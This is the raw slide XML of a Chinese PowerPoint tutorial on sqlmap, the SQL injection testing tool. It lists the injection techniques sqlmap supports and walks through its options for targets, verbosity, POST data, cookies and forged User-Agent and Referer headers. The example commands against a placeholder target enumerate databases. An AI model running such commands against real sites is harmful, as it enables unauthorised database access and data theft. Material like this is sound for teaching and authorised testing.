              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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sqlmap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72708" y="9505142"/>
            <a:ext cx="6619120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zh-CN" altLang="en-US" sz="1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577" y="1734600"/>
            <a:ext cx="444627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一、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Sqlmap</a:t>
            </a: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简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mj-lt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6655" y="4896485"/>
            <a:ext cx="20344765" cy="3923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	  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sqlmap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是一种开源的渗透测试工具，可以自动检测和利用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注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。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577" y="1734600"/>
            <a:ext cx="444627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一、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Sqlmap</a:t>
            </a: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简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mj-lt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6655" y="5533390"/>
            <a:ext cx="20344765" cy="26492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支持的数据库：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MySQL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，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Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB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577" y="1734600"/>
            <a:ext cx="444627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一、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Sqlmap</a:t>
            </a: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简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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+mj-lt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9300" y="3555365"/>
            <a:ext cx="20344765" cy="740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sqlmap支持五种不同的注入模式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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</a:p>
          <a:p>
            <a:pPr marL="2400300" marR="0" lvl="4" indent="-5715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UNION query SQL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injection（可联合查询注入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）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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400300" marR="0" lvl="4" indent="-5715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Error-based SQL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injection（报错型注入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）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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400300" marR="0" lvl="4" indent="-5715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Boolean-based blind SQL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injection（布尔型注入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）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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400300" marR="0" lvl="4" indent="-5715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Time-based blind SQL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injection（基于时间延迟注入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）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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400300" marR="0" lvl="4" indent="-571500" algn="l" defTabSz="825500" rtl="0" fontAlgn="auto" latinLnBrk="0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Stacked queries SQL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injection（可多语句查询注入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）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0277" y="1658400"/>
            <a:ext cx="470027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二、设置目标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URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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015" y="3354388"/>
            <a:ext cx="20920075" cy="88652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857250" marR="0" lvl="2" indent="-85725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-u  /--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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url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+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="2" indent="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最基本格式  </a:t>
            </a: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  -</a:t>
            </a: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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="44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“http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://www.target.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="44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index.php?id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=1”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+mn-lt"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="857250" marR="0" lvl="2" indent="-85725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-m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="2" indent="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从文本中获取多个目标扫描，但是每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	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一行只能有一个</a:t>
            </a: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url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.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="2" indent="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 -m urllist.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" marR="0" lvl="2" indent="-85725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-r </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="2" indent="0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从文件中加载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请求，这样的话 就不需要在去设定</a:t>
            </a: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cookie,POST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数据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......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等等。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912" y="1734600"/>
            <a:ext cx="4673600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altLang="en-US" sz="4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charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>三、设置回显等级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95600" y="3462245"/>
            <a:ext cx="20344765" cy="8620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参数：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-v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默认为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0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、只显示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python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错误以及严重的信息。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、同时显示基本信息和警告信息。（默认等级）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2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、同时显示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debug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信息。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3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同时显示注入的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payload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4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、同时显示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请求。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5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、同时显示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响应头。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="7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6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、同时显示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响应页面。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969" y="1772700"/>
            <a:ext cx="7817485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四、设置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HTTP</a:t>
            </a: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数据包相关参数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9510" y="2726373"/>
            <a:ext cx="20344765" cy="98482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参数：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--data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此参数是把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data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后面的数据以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POST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方式提交，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会像检测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GET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参数一样检测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POST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提交过去的参数。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python sqlmap.py -u "http://www.target.com/vuln.php" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>--data="id=1"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参数：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--cookie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当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web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需要登录的时候，需要我们抓包获取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cookie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参数，然后复制出来，加到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--cookie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参数中。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--cookie=”Cookie: Hm_lvt6910067,1546929561,1547001094,1547024662; PHPSESSID=o64fbvo316lg59njufl2gfutm4; ”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969" y="1772700"/>
            <a:ext cx="7817485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四、设置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HTTP</a:t>
            </a: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数据包相关参数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9130" y="3287396"/>
            <a:ext cx="21346795" cy="8026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HTTP User-Agent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头</a:t>
            </a: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参数：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--user-agent</a:t>
            </a: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默认情况下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sqlmap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HTTP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请求头中的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User-Agent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值是： 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sqlmap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/1.0-dev-xxxxxxxxx(http://sqlmap.org)</a:t>
            </a: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这个时候可以手动指定伪造一个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User-Agent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L="0"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sqlmap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  -u “http://www.target.com” --level 3 --user-agent=”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aaaaaa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” --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dbs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Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0"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+mn-lt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参数：--random-agent  会从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/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usr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/share/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sqlmap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+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>/data/txt/user-agents.txt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中随机产生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User-Agent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头。</a:t>
            </a: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 -u “http://www.target.com” --level 3 --random-agent --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dbs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检查uesr-agent中的注入点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, level&gt;=3才会去检查user-agent头是否存在注入漏洞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969" y="1772700"/>
            <a:ext cx="7817485" cy="1250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</a:pPr>
            <a:r>
              <a:rPr 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四、设置</a:t>
            </a:r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HTTP</a:t>
            </a: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数据包相关参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="1" kern="100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603050405020304" charset="0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3475" y="4099878"/>
            <a:ext cx="20344765" cy="551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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="44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Referer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头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参数：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referer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sqlmap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可以在请求中伪造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HTTP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中的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referer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。</a:t>
            </a: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sqlmap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  -u “http://www.target.com/?id=1”  --</a:t>
            </a:r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referer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Helvetica Light"/>
              </a:rPr>
              <a:t>=”http://www.baidu.com” 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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="2" algn="l" defTabSz="8255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当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--level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参数设定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&gt;=3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时，会尝试进行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referer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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>注入。</a:t>
            </a:r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1479</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>129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Helvetica Light</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>冬青黑体简体中文 W3</vt:lpstr>
      <vt:lpstr>方正行楷简体</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings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Administrator</cp:lastModifiedBy>
  <cp:revision>461</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-14T02:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-27T13:04:27Z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